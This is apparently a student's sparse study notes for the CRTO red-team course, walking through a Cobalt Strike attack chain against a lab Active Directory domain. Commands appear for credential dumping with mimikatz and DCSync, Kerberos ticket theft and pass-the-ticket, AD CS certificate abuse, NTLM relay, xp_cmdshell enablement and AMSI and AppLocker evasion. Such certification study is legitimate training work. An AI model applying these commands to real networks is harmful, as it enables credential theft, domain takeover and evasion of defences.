CRTO note
CRTO note
A large part of it lacks details; some of them are unnecessary, and some I was too lazy to write. I might fill them in later when I have time.
External Reconnaissance
DNS Records
dig
whois
dnscan
Spoofy - Weak email security (SPF,DMARC and DKIM)
Google Dorks
site intitle inurl intext filetype
Social Media
Initial Compromise
HTML Smuggling
Password Spraying
Two excellent tools for password spraying against Office 365 and Exchange are MailSniper and SprayingToolkit.
Next, we need to find valid usernames from the list of users enumerated from https://cyberbotic.io.
nameenum.py is a python script that I’ve used for as long as I can remember.
It will take a person’s full name and transform it into possible username permutations.
Internal Phishing
Initial Access Payloads
VBA Macros
Remote Template Injection
Host Reconnaissance
Before we carry out any post-exploitation steps, it’s prudent to take stock of the current situation
Offense in Depth’ is a similar concept for red teamers
processes
ps
User Sessions
net logons
Seatbelt
Seatbelt is a C# tool which automatically collects enumeration data for a host.
beacon> execute-assembly C:\Seatbelt.exe -group=system
Screenshots
beacon> screenshot
Keylogger
beacon> Keylogger
beacon> jobs
beacon> jobkill 6
Clipboard
beacon> clipboard
Host Persistence
Task Scheduler
Startup Folder
C:\Users\abcd\AppData\Roaming\Microsoft\Windows\Start Men\Programs\Startup\
Registry AutoRun
Hunting for COM Hijacks
need to dive into it
Host Privilege Escalation
Windows Services
Unquoted Service Paths
beacon> run wmic service get name,pathname
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl
Weak Service Permissions
Weak Service Binary Permissions
UAC Btpasses
beacon> elevate uac-schtasks tcp-local
Credential Theft
beacon> mimikatz token::elevate ; lsadump::sam
beacon> mimikatz !sekurlsa::logonpasswords # OPSEC: event 4656
Extracting Kerberos Tickets
beacon> execute-assembly C:\Rubeus.exe triage
If we only wanted the TGT for jking,we can do:
beacon> execute-assembly C:\Rubeus.exe dump /luid:0x7049f /service:krbtgt
DCSync
This requires GetNCChanges which is usually only available to domain admins
Beacon has a dedicated dcsync command,which calls mimikatz lsadump::dcsync in the background
OPSEC: it generate 4662 events
Domain Reconnaissance
PowerView
beacon> powershell-import C:\PowerView.ps1
beacon> powershell Get-Domain
beacon> powershell Get-DomainController | select Forest, Name, OSVersion | fl
beacon> powershell Get-ForestDomain
Returns the default domain policy or the domain controller policy fot the current domain.
Useful for finding information such as the domain password policy.
beacon> powershell Get-DomainPolicyData | select -expand SystemAccess
Returns all or specific user(s).To only return specific properties,use -Properties.USe -Identity to return a specific user.
beacon> powershell Get-DomainUser -Identity jking -Properties DisplayName, MemberOf |fl
Return all computers or specific computer objects
beacon> powershell Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
beacon> powershell Get-DomainTrust
SharpView
It has much the same functionality.
ADSearch
User Impersonation
Pass the Hash
beacon> pth DEV\jking
beacon> ls \web.dev.cyberbotic.io\C$
beacon> rev2self
Pass The Ticket
beacon> execute-assembly C:\Rebeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
beacon> execute-assembly C:\Rebeus.exe ptt /luid:0x798c2c /ticket:
beacon> steal_token < first step process pid>
opsec:
beacon> execute-assembly C:\Rebeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123
Overpass the Pass
Overpass the Hash is a technique which allows us to request a Kerberos TGT for a user,using their NTLM or AES hash.
Elevated privileges are required to obtain user hashes,but not actually request a ticket
beacon> execute-assembly C:\Rebeus.exe asktgt /user:jking /ntlm: /nowrap
beacon> execute-assembly C:\Rebeus.exe asktgt /user:jking /aes256: /nowrap
Token Impersionation
beacon> steal_token 5536
Token Store
Cobalt Strike4.8 introduced a new set of commands called toekn-store.This is an evolution on the steal_token command which allows
you to steal and store tokens for future use.
beacon> token-store steal 5536
beacon> token-store use 0
Make Token
The make_token command allows you to impersonate a user if you know their plaintext password.
beacon> make_token DEV\jking Qwerty123
beacon> remote-exec winrm web.dev.cyberbotic.io whoami
Process Injection
Lateral Movement
jump
Windows Remote Management
winrm and winrm64
PsExec
Windows Management Instrumentation (WMI)
Session Passing
Use different C2 frameworks as backup access in the event the current access is lost.
Beacon passing
spawn
Data Protection API
Kerberos
Scheduled Task Credentials
Resource-Based Constrained Delegation RBDC
The two major prerequisites to pull off the attack are:
1.A target computer on which you can modify msDS-AllowedToActOnBehalfOfOtherIdentity.
2.Control of another principal that has an SPN
Shadow Credentials
Kerberos Relay Attacks
Kerberoasting
ASPREP Roasting
Unconstrained Delegation
Constrained Delegation
Alternate Service Name
S4U2Self Abuse
Pivoting
SOCKS Proxies
Relaying WebDAV
Linux Tools
Pivoting with Kerberos
getTGT.py -dc-ip 10.10.122.10 -aesKey dev.cyberbotic.io/jking
export KRB5CCNAME=jking.ccache
Now we can use psexec.py to get a SYSTEM shell on web
psexec.py -dc-ip 10.10.122.10 -target-ip 10.10.122.30 -no-pass -k dev.cyberbotic.io/[email protected]
NTLM Relaying
Active Directory Cerificate Services
AD CS is a server role that allows you to build a public key infrastructure aka PKI.
this can provide public key cryptography,digtal certificates, and digtal signature capabilities.
Misconfigurations can introduce security risks that actors can exploit-in this case,for privilege escalation(even domain user to domain admin) and persistence.
Finding Certificate Authorities
This will output a lots of useful information,including the root CA and subordinate CAs.
beacon> execute-assembly C:\Certify.exe cas
Misconfigured Certificate Templates
Certify can also find vulnerable templates
beacon> execute-assembly C:\Certify.exe find /vulnerable
What template is vulnerable?
1.This templates is server by sub-ca.
2.The template is called CustomUser.
3.ENROLLEE_SUPPLIES_SUBJECT is enabled,which allows the certificat requestor to provide any SAN.
4.The certificate usage has Client Authentication set.
5.DEV\Domain Users have enrollment rights,so any domain user may requests a certificate from this template.
This configuration allows any domain user to request a certificate for any other domain user(including a domain admin) and use it for
authentication.Request a certificate for nlamb.
beacon> execute-assembly C:\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb
Copy the whole certificate (both the private key and certificate) and save it to cert.pem on Ubuntu WSL.Then use the provide opnessl
command to convert it to pfx format
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographis Provider v1.0" -export -out cert.pfx
Convert cert.pfx into a base64 encoded string so it can be used with Rebeus
$ cat cert.pfx | base64 -w 0
Then use asktgt to request a TGT for the using the certificate.
beacon> execute-assembly C:\Rebeus.exe asktgt /user:nlamb /certificate /password:pass123 /nowrap
NTLM Relaying to ADCS HTTP Endpoints
ADCS services support HTTP enrolment methods and includes a GUI. This endpoint is usually found at http[s]:///certsrv
IF NTLM authentication is enabled,these endpoints are vulnerable to NTLM relay attacks.
To achieve this,we need:
- PortBender on WorkStation 2 to capture traffic on port 445 and redirect it to port 8445.
- A reverse port forward to forward traffic hitting port 8445 to the team server on port 445.
- A SOCKs proxy for NTLMrelayx to send traffic back into the network
$ sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
Then force the authentication to occur from WEB to WKSTN-2
beacon> execute-assembly C:\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102
User & Computer Persistence
Certificates can also be useful for maintaining persistent access to both users and computers.
Certificates can be exported with MImikatz using crypto::certificates (although it drops them to disk).
beacon> mimikazte crypto::certificates /export
Computer Persistence
beacon> mimikazte !crypto::certificates /systemstore:local_macheine /export
Group Policy
Group Policy is the central repository in forest or domain that controls the configuration of computers and users.
Group Policy Objects aka GPOs are sets of configurations that are applied to Organisation Units aka OUs.By default,only Domain Admin can
create GPOs and link them to OUs,but it's common practice to delegate those rights to other teams.
This can create privilege escalation opportunities by allowing user to apply malicious GPOs to domain admin users or their computer.
Modify Existing GPO
Enumerate all GPOs in the domain with Get-DomainGPO and check the ACL of each one with Get-DomainObjectAcl
Resolve the GPO name and the SID of the principal
we can modify the associated files directly in SYSVOL
use an automated tool such as SharpGPOAbuse
Create & Link a GPO
We can find these with PowerView's Get-DomainObjectAcl cmdlet by lokking for those that have "CreateChild" rights on the "Group-Policy-Container", and then resolving their SIDs to readable names.
Looking for instances of "WriteProperty" over "GP-Link".
require a reboot to execute
MS SQL Servers
Command Execution
To enumerate the current state of xp_cmdshell,user:
Select value FROM sys.configurations WHERE name = 'xp_cmdshell';
A value of 0 shows that xp_cmdshell is disabled.To enable it:
sp_configure 'Show Advanced Options', 1; RECONFIURE;
sp_configure 'xp_cmdshell', 1; RECONFIURE;
Query again and the xp_cmdshell value should be 1; and xp_cmdshell will also now work.
EXEC xp_cmdshell 'whoami';
Lateeral Movement
SQL Servers have a concept called "links",which allows a database instance to access data from an external source.
We can discover any links that the current instance has:
SQL> SELECT srvname, srvproduct, rpcout FROM master..sysservers;
This shows that SQL-2 has link to SQL-1.The SQLRecon links module could also be used.
beacon> execute-assembly C:\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:links
We can send SQL queries to linked servers using OpenQuery:
SQL> SELECT * FROM OPENQUERY("sql-1.dev.cyberbotic.io",'select @@servername'); # notice,double and single quotes
Or with SQLRecon
beacon> execute-assembly C:\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:lquery /l:sql-1.dev.cyberbotic.io /c:"select @@servername"
Then use xp_cmdshell to get access.
Privilege Escalation
Use SweetPotato
beacon> execute-assemble C:\SweetPotato.exe -p cmd
Microsoft Configuration Manager
Domain Dominance
Keep Calm And Rebuild The Entire Forest
Silver Tickets
Golden Tickets
Diamond Tickets
Forged Certificates
Forest & Domain Trusts
beacon> powershell Get-DomainTrust
Parent/Child
SID history was designed to support migration screnarios,where a user would be moved from one domain to another
One-way Inbound
Inbound trust
Domain A has a one-way inbound trust from Domain B. If you get a Domain B account, you can access Domain A.
One-way Outbound
Outbound trust
Domain A has a one-way outbound trust to Domain B. If you get a Domain A account, you can access Domain B, but not the other way around.
Local Administrator Password Solution
gold image
ms-Mcs-AdmPwd
Microsoft Defender Antivirus
Get-MpThreatDetection | sort $_.InitialDetectionTime | select -First 1
Command Line Detections
like: pth
Artifact Kit
It's too troublesome and a bit inefficient??
it actually modifies is the loader?
Malleable C2
memory scan
set userwx "false";
set cleanup "true";
it tells Beacon to free the memory associated with the reflective loader after it has been loaded.
set obfuscate "true";
without its DLL headers.
set module_x64 "xpsservices.dll";
make dll loaded from disk rather than memory
1.The DLL size must be equal to or greater than Beacon.
2.The DLL must not be needed by the application hosting Beacon. This isn’t a concern when executing the artifacts, but does become relevant when injecting Beacon shellcode into existing processes.
Resource Kit
AMSI
AMSI vs Post-Exploitation
Cobalt Strike introduced a configuration that we can apply in Malleable C2 called amsi_disable.
This uses a memory-patching technique which i have blogged about before to disable AMSI in the spawned process prior to injecting the pose-ex capability.
Right above the "hhtp-get" block,add the following:
post-ex {
set amsi_disable "trued";
}
tips: amsi_disable only applies to pwerpick execute-assembly and psinject.It does not apply to the powershell command
Manual AMSI Bypasses
Behavioural Detections
beacon> spawnto
Parent/Child Relationship
Application Whitelisting
AppLocker
Its purpose is to restrict applications and scripts that are allowed to mkrun on a machine
Writeable Paths
C:\Program Files and C:\Windows(including subdirectories)
Living Off The Land Binaries, Script and Libraries
MSBuild.exe
Beacon DLL
DLL enforcement is not commonly enabled which allows us to call exported functions from DLLs on disk via rundll32.
Beacon's DLL payload exposes several exports including DllMain and StartW.
C:\Windows\System32\rundll32.exe http_x64.dll,StartW
Data Hunting & Exfiltration
File Shares
Database
Extending Cobalt Strike
The best C2 Franeworks are those that have the capability to customise and diversify its behaviours.
The ".cna" files that we load into the cobalt strike script manager are called Aggressor Scripts.
Beacon Object Files
beacon> inline-execute C:\Demo.o
BOFs can be integrated with Aggressor by registering custom aliases and commands.
Malleable Command & Control
Many of Beacon's indicators are controllable via malleable C2 profiles,including network and in-memory artifacts.